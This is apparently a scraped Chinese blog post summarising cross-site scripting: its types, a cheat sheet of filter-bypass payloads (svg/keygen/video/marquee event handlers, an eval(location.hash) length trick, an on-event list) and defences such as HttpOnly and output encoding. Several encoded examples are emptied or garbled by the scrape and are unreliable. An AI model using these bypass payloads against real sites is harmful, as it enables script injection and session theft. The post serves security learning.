## xss原理 xss產生的原因是將惡意的html指令碼程式碼插入web頁面，底層原理和sql注入一樣，都是因為js和php等都是解釋性語言，會將輸入的當做命令執行,所以可以注入惡意程式碼執行我們想要的內容 ## xss分類 * 儲存型xss: js指令碼程式碼會插入資料庫，具有一定的永續性 * 反射型xss: js經過後端php等語言處理 * dom型xss: 和反射型xss類似，但是不經過後端伺服器的處理 ## xss繞過總結: ### 自身繞過 ``` //沒有過濾 //大小寫繞過 alert('xss') //巢狀繞過 alert('xss') //空位元組繞過 " oonnclick=alert('XSS') // //閉合單雙引號繞過(對於html實體輸入的和過濾< >) ``` ### 其他標籤繞過 ``` show <svg onload=alert(1)> <keygen autofocus onfocus=alert(1)> <video><source onerror="alert(1)"> <marquee onstart=alert(1)> ``` ### 編碼繞過 #### base64編碼繞過 ``` show <img src="x"> ``` #### Unicode編碼繞過 線上編碼地址:http://tool.chinaz.com/tools/unicode.aspx ``` <img src="x"> <img src="x"> ```  #### url編碼繞過 ``` <img src="x"> ``` #### Ascii碼繞過 ``` ``` 可使用瀏覽器外掛快速編碼  #### hex繞過 ``` <img src="x"> ``` #### 十進位制，八進位制，十六進位制 ``` <img src="x"> <img src="x"> <img src="x"> <img src="x"> <img src="x"> <img src="x"> ``` ### 補充:on事件 ``` onsearch onwebkitanimationend onwebkitanimationiteration onwebkitanimationstart onwebkittransitionend onabort onblur oncancel oncanplay oncanplaythrough onchange onclick onclose oncontextmenu oncuechange ondblclick ondrag ondragend ondragenter ondragleave ondragover ondragstart ondrop ondurationchange onemptied onended onerror onfocus onformdata oninput oninvalid onkeydown onkeypress onkeyup onload onloadeddata onloadedmetadata onloadstart onmousedown onmouseenter onmouseleave onmousemove onmouseout onmouseover onmouseup onmousewheel onpause onplay onplaying onprogress onratechange onreset onresize onscroll onseeked onseeking onselect onstalled onsubmit onsuspend ontimeupdate ontoggle onvolumechange onwaiting onwheel onauxclick ongotpointercapture onlostpointercapture onpointerdown onpointermove onpointerup onpointercancel onpointerover onpointerout onpointerenter onpointerleave onselectstart onselectionchange onanimationend onanimationiteration onanimationstart ontransitionend onafterprint onbeforeprint onbeforeunload onhashchange onlanguagechange onmessage onmessageerror onoffline ononline onpagehide onpageshow onpopstate onrejectionhandled onstorage onunhandledrejection onunload ``` ### 長度限制的繞過: #### 可以利用事件如: ``` "onclick=alert(1)// 來減少字數 ``` #### 將程式碼藏入location.hash中，構造為 ``` "onclick="eval(location.hash.sustr(1)) ``` #### 註釋將兩個文字框變為一個 #### 奇怪的符號解析 ``` <svg/onload=alert()><div class="adscc"> <center><script type="text/javascript" src="/js/article.js"></script></center></div><div style="clear:both;"></div> <script/src=//⑭.₨> ``` 參考文章:https://nosec.org/home/detail/3206.html ## xss防禦 1. 設定cookie中設定httponly屬性，那麼js指令碼將無法讀取到cookie資訊 PHP5(PHP5.2以上版本已支援HttpOnly引數的設定，同樣也支援全域性的HttpOnly的設定，在php.ini中設定，設定其值為1或者TRUE，來開啟全域性的Cookie的HttpOnly屬性) session.cookie_httponly = 當然程式碼也能實現： ini_set("session.cookie_httponly", 1); session_set_cookie_params(0, NULL, NULL, NULL, TRUE); 2. 限制輸入長度，在業務內減少使用者能輸入長度，像年齡，使用者名稱等地方限制15個字元，幾乎就很難xss（個人理解） 3. 過濾業務用不到的字元如< >，script等標籤字元 4. 輸出檢查，輸出到url的進行URLEncode，輸出進行html實體化輸出 5. 成熟框架相對安全些（注意是相對） ## 參考文章 深入理解瀏覽器解析機制和XSS向量編碼：http://bobao.360.cn/learning/detail/292.html XSS過濾繞過速查表：https://www.freebuf.com/articles/web/153055.html 《白帽子講web安全》 歡迎訪問我的個人部落格：https://lmg66.github.io/ 說明：本文僅限技術研究與討論，嚴禁用於非法用途，否則產生的一切後果自 </div> <div class="entry-footer"> <div class="entry-tag"> </div> <div class="entry-page"> <center><script type="text/javascript" src="/js/article.js"></script></center> </div> <h3 class="entry-related-title">相關推薦</h3> <style> .r{ margin-bottom:10px; border-bottom:1px solid #f1f1f1; padding-bottom:10px;} .r p{ color:#999; line-height:25px;} .r h5 a{ font-size:16px; line-height:25px;} .r h5 a:hover{ color:#ff6600} </style> <div class="r"> <h5><a href="/content/1595596982.html" target="_blank"><font color=red>xss</font><font color=red>原理</font><font color=red>繞過</font><font color=red>防禦</font><font color=red>個人</font><font color=red>總結</font></a></h5> <p> ## xss原理 xss產生的原因是將惡意的html指令碼程式碼插入web頁面，底層原理和sql注入一樣，都是因為js和php等都是解釋性語言，會將輸入的當做命令執行,所以可以注入惡意程式碼執行我們想要的內容 ## xss分類 * 儲存型xss: js指令碼程式碼會插入資料庫，具有一定的永續性 * 反射型x </p> </div> <div class="r"> <h5><a href="/content/1505795934.html" target="_blank"><font color=red>XSS</font>插入<font color=red>繞過</font>一些方式<font color=red>總結</font></a></h5> <p> image 移除 dep hash 時間差 timeout tree 弱點 chrome 詳見：http://blog.csdn.net/keepxp/article/details/52054388 1 常規插入及其繞過 1.1 Script 標簽 繞過進行一次移除操 </p> </div> <div class="r"> <h5><a href="/content/1586594882.html" target="_blank"><font color=red>XSS</font>編碼問題的<font color=red>個人</font><font color=red>總結</font></a></h5> <p> XSS也太太太難了，主要也是因為自己沒花時間集中。 文章脈絡：根據我粗淺的理解，從開始學習XSS到現在，從一開始的見框就插到現在去學構造、編碼，首先需要的是能看懂一些payload，然後再去深入理解。所以，文章首先會介紹一些常見的可供利用的編碼，然後再理解瀏覽器如何解析HTML文件，最後再總結一下。應該有很多 </p> </div> <div class="r"> <h5><a href="/content/1548232024.html" target="_blank"><font color=red>XSS</font>的一些<font color=red>總結</font>(<font color=red>原理</font>+檢測+<font color=red>防禦</font>)</a></h5> <p> 0x00 XSS 簡述 原理介紹 跨站指令碼漏洞（XSS）是一種將惡意 JavaScript 程式碼插入到其他Web使用者頁面裡執行以達到攻擊目的的漏洞。Web應用軟體將使用者的互動資訊沒有作有效驗證和過濾就輸出給了其他使用者，攻擊者插入的可執行指令碼就可能形成跨站指 </p> </div> <div class="r"> <h5><a href="/content/1502194809.html" target="_blank"><font color=red>xss</font><font color=red>原理</font>、攻擊方式與<font color=red>防禦</font></a></h5> <p> 客戶端 包含 pre window frame com 跨站 行處理 iframe xss原理： xss叫跨站腳本攻擊，是Web程序中常見的漏洞只用於客戶端的攻擊方式，其原理是攻擊者向有XSS漏洞的網站中輸入(傳入)惡意的HTML代碼，當其它用戶瀏覽該網站時，這段HTML代 </p> </div> <div class="r"> <h5><a href="/content/1533754960.html" target="_blank"><font color=red>XSS</font> 漏洞<font color=red>原理</font>及<font color=red>防禦</font>方法</a></h5> <p> 正則表達 內容 規則 分享 保存 名單 nbsp 只需要 服務 XSS跨站腳本攻擊：兩種情況。一種通過外部輸入然後直接在瀏覽器端觸發，即反射型XSS；還有一種則是先把利用代碼保存在數據庫或文件中，當web程序讀取利用代碼並輸出在頁面上時觸發漏洞，即存儲型XSS。 危害：前端 </p> </div> <div class="r"> <h5><a href="/content/1544758202.html" target="_blank">跨站指令碼攻擊（<font color=red>XSS</font>） 漏洞<font color=red>原理</font>及<font color=red>防禦</font>方法</a></h5> <p> 注：轉載請註明出自：https://blog.csdn.net/qq_36711453/article/details/83745195 XSS跨站指令碼攻擊：兩種情況。一種通過外部輸入然後直接在瀏覽器端觸發，即反射型XSS；還有一種則是先把利用程式碼儲存在資料庫或檔案中，當web程式讀取利用程 </p> </div> <div class="r"> <h5><a href="/content/1545829629.html" target="_blank">Http-only<font color=red>原理</font>與<font color=red>防禦</font><font color=red>XSS</font>實踐</a></h5> <p> 預備知識 XSS攻擊       Http-only的設計主要是用來防禦XSS攻擊，所以學習本實驗的讀者應首先了解XSS攻擊的相關原理內容。       跨站點指令碼攻擊是困擾Web伺服器安全的常見問題之 </p> </div> <div class="r"> <h5><a href="/content/1546921099.html" target="_blank">php <font color=red>XSS</font>攻擊<font color=red>原理</font>與<font color=red>防禦</font></a></h5> <p> 資料安全是軟體設計中要考慮的問題,在程式中保持資料的安全,除了保證程式碼內部執行的可靠,最主要就是嚴格控制外部資料,秉持一切使用者輸入的都是不可靠的原則,做好資料的驗證和過濾. PHP最簡單的過濾機制就是轉義,對使用者的輸入和輸出進行轉義和過濾. 我們先搞一 </p> </div> <div class="r"> <h5><a href="/content/1548193350.html" target="_blank"><font color=red>XSS</font>和CSRF的<font color=red>原理</font>及<font color=red>防禦</font></a></h5> <p> XSS是跨站指令碼攻擊，是一種常見的web應用程式中的電腦保安漏洞，xss通過使用者端注入惡意的可執行指令碼，若伺服器對使用者輸入不進行處理，直接將使用者的輸入輸出到瀏覽器，然後瀏覽器將會執行注入的指令碼；可以直接寫一個可執行指令碼，也可以直接寫html，在標籤裡面寫一個惡意 </p> </div> <div class="r"> <h5><a href="/content/1550351710.html" target="_blank">詳解<font color=red>XSS</font>跨站指令碼攻擊<font color=red>原理</font>及<font color=red>防禦</font></a></h5> <p> 比較常見的一種場景就是，黑客寫下一篇包含有惡意JavaScript程式碼的部落格文章，文章發表後，所有訪問該部落格文章的使用者，都會在他們的瀏覽器中執行這段惡意的Javascript程式碼。黑客把惡意的指令碼儲存到伺服器端，所以這種XSS攻擊叫做“儲存型XSS”。也叫做“持久型XSS”，因為從效果上來說，它存 </p> </div> <div class="r"> <h5><a href="/content/1494138255.html" target="_blank"><font color=red>個人</font><font color=red>總結</font>_5.6</a></h5> <p> 今天 總結 個人總結 -s 功能 family 全面 spa size 昨天幹了什麽： 　　窗口框架 今天幹了什麽： 　　swing組件，邊學邊寫 困難： 　　設計布局，功能想不全面個人總結_5.6 </p> </div> <div class="r"> <h5><a href="/content/1494176585.html" target="_blank"><font color=red>個人</font><font color=red>總結</font>4-dbutils<font color=red>總結</font></a></h5> <p> 基本 user 步驟 昨天 基礎 問題 頁面 發現 個人總結 昨天學習了dbutils的使用方法，簡化了使用的步驟，可以使用三四步就可以寫出來，queryRunner的使用方法有了簡單的了解，目前可以使用dbutils實現最簡單的增刪改查。 今天 </p> </div> <div class="r"> <h5><a href="/content/1494212403.html" target="_blank"><font color=red>個人</font>階段<font color=red>個人</font><font color=red>總結</font>07</a></h5> <p> bootstrap 發布 不能 數據 連接 dbutil 設計 使用 ots 昨天做了什麽？利用學習的bootstrap的知識，進行主界面和各個界面的前段的編寫，進行了美化的處理，完成了前端的設計。 今天準備做什麽？進行後端消息的發布界面的後臺的的程序的設計。 遇到了什麽困 </p> </div> <div class="r"> <h5><a href="/content/1494330130.html" target="_blank">第八屆山東省ACM大學生程序設計競賽<font color=red>個人</font><font color=red>總結</font></a></h5> <p> 我們 斐波那契 實現 結果 。。 學校 合數 工作 們的 因為省賽，從開學緊張到5月7號。心思也幾乎全放在ACM的訓練上。因為我還是校臺球協會的會長，所以臺協還有一些事情需要忙，但是我都給延遲了。老會長一直在催我辦校賽，但我一直說 等等吧，因為校賽只能在周六 </p> </div> <div class="r"> <h5><a href="/content/1494606242.html" target="_blank"><font color=red>個人</font><font color=red>總結</font>_5.10</a></h5> <p> span 調試 什麽 理解 程序 font 個人 昨天 鬧鐘 昨天幹了什麽 　　查找鬧鐘代碼 今天幹了什麽 　　完善代碼 困難　 　　搜到的代碼不理解，程序調試不成功個人總結_5.10 </p> </div> <div class="r"> <h5><a href="/content/1494687785.html" target="_blank"><font color=red>個人</font>作業3——<font color=red>個人</font><font color=red>總結</font>（Alpha階段)</a></h5> <p> 服務 不同 做到 用戶需求 用例 多語 n) 安排時間 想想 一、問題集錦 【問題一】在本書對於師生關系的講解中提到，最理想的師生關系是“健身教練/健身學員”。我認為“老師/學生”本來就是一種明確的關系，老師授業解惑，學生學習吸收。而再將這種關系比喻為健身教練與學員，難到 </p> </div> <div class="r"> <h5><a href="/content/1494691588.html" target="_blank"><font color=red>個人</font>作業3——<font color=red>個人</font><font color=red>總結</font>（Alpha階段）</a></h5> <p> view 做成 名詞 估算 支持多語言 擴展 常用模塊 不同的 日誌 1.說到軟件工程作業，很多同學都曾經苦惱過，想放棄。可是，當你堅持寫完的時候，突然間心情大好，發現原來自己能做得到。我也是這樣，缺乏自信心了，沒有人在後面推一把，就很難前進。框架吧，是用來打破的。我們不能 </p> </div> <div class="r"> <h5><a href="/content/1494824233.html" target="_blank"><font color=red>個人</font>作業3--<font color=red>個人</font><font color=red>總結</font>（Alpha階段）</a></h5> <p> target 愛好 項目 leader 平衡 構建 個人總結 spa 發的 我們也算是經過了一次軟件開發的人了，在Alpha階段過程和結果都不太理想，我們在寫事後諸葛亮會議的時候也感慨了很多，在小組會議的時候也討論了很多，為了完成這次作業，我又翻了翻《構建之法》這本書。這本 </p> </div> <div class="r"> <h5><a href="/content/1494831429.html" target="_blank"><font color=red>個人</font>作業3——<font color=red>個人</font><font color=red>總結</font></a></h5> <p> 空閑 流程 正在 想法 管理工具 它的 應付 多語 做了 一、問題 1.在《構建之法》這本書的2.1.2這一小節我看到了一句這樣的話“單元測試必須由最熟悉代碼的人（程序的作者）來寫”，可是在整個alpha版本階段中我們的代碼編寫和測試代碼的編寫都是由不同的人來完成，編寫代碼 </p> </div> <!-- <ul class="entry-related clearfix"> <li> </li> </ul>--> </div> </div> </article> </div> <aside class="sidebar"> <div id="search-7" class="widget widget_search"> <h3 class="widget-title">搜尋</h3> <form name="formsearch" class="search-form" action="https://www.796t.com/public/api.php" method="get"> <input type="hidden" name="app" value="search"/> <input type="text" class="keyword" name="q" placeholder="輸入關鍵詞..." value=""> <input type="submit" class="submit" value=""> </form> </div> <div id="wpcom-image-ad-4" class="widget widget_image_ad"></div> <div id="tag_cloud-3" class="widget widget_tag_cloud"> <h3 class="widget-title">基礎教學</h3> <div class="tagcloud"> <a href="https://www.796t.com/category.php?cid=18" class="tag-cloud-link tag-link-66 tag-link-position-1" style="font-size: 22pt;">Mysql入門</a> <a href="https://www.796t.com/category.php?cid=19" class="tag-cloud-link tag-link-66 tag-link-position-1" style="font-size: 22pt;">Sql入門</a> <a href="https://www.796t.com/category.php?cid=20" class="tag-cloud-link tag-link-66 tag-link-position-1" style="font-size: 22pt;">Android入門</a> <a href="https://www.796t.com/category.php?cid=21" class="tag-cloud-link tag-link-66 tag-link-position-1" style="font-size: 22pt;">Docker入門</a> <a href="https://www.796t.com/category.php?cid=22" class="tag-cloud-link tag-link-66 tag-link-position-1" style="font-size: 22pt;">Go語言入門</a> <a href="https://www.796t.com/category.php?cid=23" class="tag-cloud-link tag-link-66 tag-link-position-1" style="font-size: 22pt;">Ruby程式入門</a> <a href="https://www.796t.com/category.php?cid=24" class="tag-cloud-link tag-link-66 tag-link-position-1" style="font-size: 22pt;">Python入門</a> <a href="https://www.796t.com/category.php?cid=25" class="tag-cloud-link tag-link-66 tag-link-position-1" style="font-size: 22pt;">Python進階</a> <a href="https://www.796t.com/category.php?cid=26" class="tag-cloud-link tag-link-66 tag-link-position-1" style="font-size: 22pt;">Django入門</a> <a href="https://www.796t.com/category.php?cid=27" class="tag-cloud-link tag-link-66 tag-link-position-1" style="font-size: 22pt;">Python爬蟲入門</a> </div> </div> <div id="wpcom-image-ad-12" class="widget widget_image_ad"> </div> <div id="wpcom-post-thumb-3" class="widget widget_post_thumb"> <h3 class="widget-title">最近訪問</h3> <ul> <p><a href="/content/.html" style="font-size:16px;"> </a> </p> </ul> </div> </aside> </div> </div> <footer class="footer"> <div class="container"> <div class="clearfix"> <div class="footer-col footer-col-copy"> <ul class="footer-nav hidden-xs"> <li id="menu-item-109589" class="menu-item current-menu-item current_page_item menu-item-109589"><a href="https://www.796t.com/" aria-current="page">首頁</a></li><li class="menu-item menu-item-373"><a href="https://www.796t.com/category.php?cid=9">前端設計</a></li><li class="menu-item menu-item-373"><a href="https://www.796t.com/category.php?cid=10">程式設計</a></li><li class="menu-item menu-item-373"><a href="https://www.796t.com/category.php?cid=13">免費資源</a></li><li class="menu-item menu-item-373"><a href="https://www.796t.com/category.php?cid=14">實用技巧</a></li><li class="menu-item menu-item-373"><a href="https://www.796t.com/category.php?cid=15">資料庫</a></li><li class="menu-item menu-item-373"><a href="https://www.796t.com/category.php?cid=29">資訊</a></li><li class="menu-item menu-item-373"><a href="https://www.3du.tw/zidian.php">字典</a></li></ul> <div class="copyright"> <p>Copyright © 2002-2020 <a href="https://www.796t.com/">程式人生</a> 796T.COM All rights reserved. </p> </div> </div> <div class="footer-col footer-col-sns"> <div class="footer-sns"> </div> </div> </div> </div> </footer> <style> .footer{padding-bottom: 20px;} </style> <script type="text/javascript" src="/css/main.js"></script> <script type="text/javascript" src="/css/wp-embed.js"></script> <script type="text/javascript" src="/css/lazysizes.min.js"></script> <script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@10.1.2/build/highlight.min.js"></script> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.1.2/styles/atelier-estuary-light.css"> <script>hljs.initHighlightingOnLoad();</script> </body> </html>